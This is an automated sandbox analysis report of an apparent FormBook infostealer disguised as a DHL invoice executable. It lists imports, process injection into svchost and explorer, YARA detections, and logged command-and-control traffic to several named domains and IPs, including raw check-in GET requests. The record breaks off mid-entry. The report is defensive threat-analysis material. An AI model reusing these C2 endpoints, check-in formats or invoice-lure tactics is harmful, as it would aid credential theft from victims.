IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x40ea8	0x41000	494435903c147b73430fffbe7f0382ba	False	0.8984375	data	7.826116146702784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x115000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x3816e	data			1.0003525694039401
RT_GROUP_ICON	0x114928	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1149a0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1149b4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1149c8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1149dc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x114ab8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-08T07:42:07.576537+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	49710	80	192.168.2.8	185.53.179.91
2024-08-08T07:41:02.068628+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	49742	80	192.168.2.8	3.33.130.190
2024-08-08T07:42:54.485193+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	49732	80	192.168.2.8	154.23.184.95

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2024 07:42:07.061240911 CEST	49710	80	192.168.2.8	185.53.179.91
Aug 8, 2024 07:42:07.066268921 CEST	80	49710	185.53.179.91	192.168.2.8
Aug 8, 2024 07:42:07.066390991 CEST	49710	80	192.168.2.8	185.53.179.91
Aug 8, 2024 07:42:07.066473961 CEST	49710	80	192.168.2.8	185.53.179.91
Aug 8, 2024 07:42:07.072401047 CEST	80	49710	185.53.179.91	192.168.2.8
Aug 8, 2024 07:42:07.569130898 CEST	49710	80	192.168.2.8	185.53.179.91
Aug 8, 2024 07:42:07.574790955 CEST	80	49710	185.53.179.91	192.168.2.8
Aug 8, 2024 07:42:07.576536894 CEST	49710	80	192.168.2.8	185.53.179.91
Aug 8, 2024 07:42:53.882800102 CEST	49732	80	192.168.2.8	154.23.184.95
Aug 8, 2024 07:42:53.887706995 CEST	80	49732	154.23.184.95	192.168.2.8
Aug 8, 2024 07:42:53.889226913 CEST	49732	80	192.168.2.8	154.23.184.95
Aug 8, 2024 07:42:53.889275074 CEST	49732	80	192.168.2.8	154.23.184.95
Aug 8, 2024 07:42:53.894062042 CEST	80	49732	154.23.184.95	192.168.2.8
Aug 8, 2024 07:42:54.398386002 CEST	49732	80	192.168.2.8	154.23.184.95
Aug 8, 2024 07:42:54.446926117 CEST	80	49732	154.23.184.95	192.168.2.8
Aug 8, 2024 07:42:54.483900070 CEST	80	49732	154.23.184.95	192.168.2.8
Aug 8, 2024 07:42:54.485193014 CEST	49732	80	192.168.2.8	154.23.184.95

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2024 07:41:46.976159096 CEST	49919	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:41:47.242764950 CEST	53	49919	1.1.1.1	192.168.2.8
Aug 8, 2024 07:42:06.991030931 CEST	58139	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:42:07.060318947 CEST	53	58139	1.1.1.1	192.168.2.8
Aug 8, 2024 07:42:26.023390055 CEST	54495	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:42:26.039946079 CEST	53	54495	1.1.1.1	192.168.2.8
Aug 8, 2024 07:42:43.110415936 CEST	49264	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:42:53.556288958 CEST	61172	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:42:53.877638102 CEST	53	61172	1.1.1.1	192.168.2.8
Aug 8, 2024 07:43:17.166632891 CEST	59956	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:43:18.169378042 CEST	59956	53	192.168.2.8	1.1.1.1
Aug 8, 2024 07:43:18.170994043 CEST	53	59956	1.1.1.1	192.168.2.8
Aug 8, 2024 07:43:18.176214933 CEST	53	59956	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 8, 2024 07:41:46.976159096 CEST	192.168.2.8	1.1.1.1	0x8e38	Standard query (0)	www.45941978.top	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:06.991030931 CEST	192.168.2.8	1.1.1.1	0xf4e	Standard query (0)	www.authentication-app-69447.bond	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:26.023390055 CEST	192.168.2.8	1.1.1.1	0xd2f4	Standard query (0)	www.borghardt.xyz	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:43.110415936 CEST	192.168.2.8	1.1.1.1	0xc19b	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:53.556288958 CEST	192.168.2.8	1.1.1.1	0xb8aa	Standard query (0)	www.hm23s.top	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:17.166632891 CEST	192.168.2.8	1.1.1.1	0x2c6b	Standard query (0)	www.alqahtani.site	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:18.169378042 CEST	192.168.2.8	1.1.1.1	0x2c6b	Standard query (0)	www.alqahtani.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 8, 2024 07:42:07.060318947 CEST	1.1.1.1	192.168.2.8	0xf4e	No error (0)	www.authentication-app-69447.bond		185.53.179.91	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:26.039946079 CEST	1.1.1.1	192.168.2.8	0xd2f4	Name error (3)	www.borghardt.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:42:43.117471933 CEST	1.1.1.1	192.168.2.8	0xc19b	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 8, 2024 07:42:53.877638102 CEST	1.1.1.1	192.168.2.8	0xb8aa	No error (0)	www.hm23s.top	hm23s.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 8, 2024 07:42:53.877638102 CEST	1.1.1.1	192.168.2.8	0xb8aa	No error (0)	hm23s.top		154.23.184.95	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:18.170994043 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	www.alqahtani.site	alqahtani.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 8, 2024 07:43:18.170994043 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	alqahtani.site		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:18.170994043 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	alqahtani.site		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:18.176214933 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	www.alqahtani.site	alqahtani.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 8, 2024 07:43:18.176214933 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	alqahtani.site		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 8, 2024 07:43:18.176214933 CEST	1.1.1.1	192.168.2.8	0x2c6b	No error (0)	alqahtani.site		3.33.130.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.authentication-app-69447.bond

www.hm23s.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	185.53.179.91	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 8, 2024 07:42:07.066473961 CEST	180	OUT	GET /jd21/?uzud=6Gu9CMF4xxBwNWcJ0Rc7SYqx+yd/BzhFIF9ofXjjgiHpTqtqGAdfmqUQNhv6VtLeomt1&IjBDz2=9rAhxBy0 HTTP/1.1 Host: www.authentication-app-69447.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49732	154.23.184.95	80	6296	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 8, 2024 07:42:53.889275074 CEST	158	OUT	GET /jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2 HTTP/1.1 Host: www.hm23s.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	01:41:06
Start date:	08/08/2024
Path:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Imagebase:	0x400000
File size:	1'145'344 bytes
MD5 hash:	6BBFDED2BAA5A18CC97D10516EE91C78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:41:07
Start date:	08/08/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Imagebase:	0x620000
File size:	1'145'344 bytes
MD5 hash:	6BBFDED2BAA5A18CC97D10516EE91C78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:41:08
Start date:	08/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Imagebase:	0xfc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:41:09
Start date:	08/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:41:12
Start date:	08/08/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\explorer.exe"
Imagebase:	0x530000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, 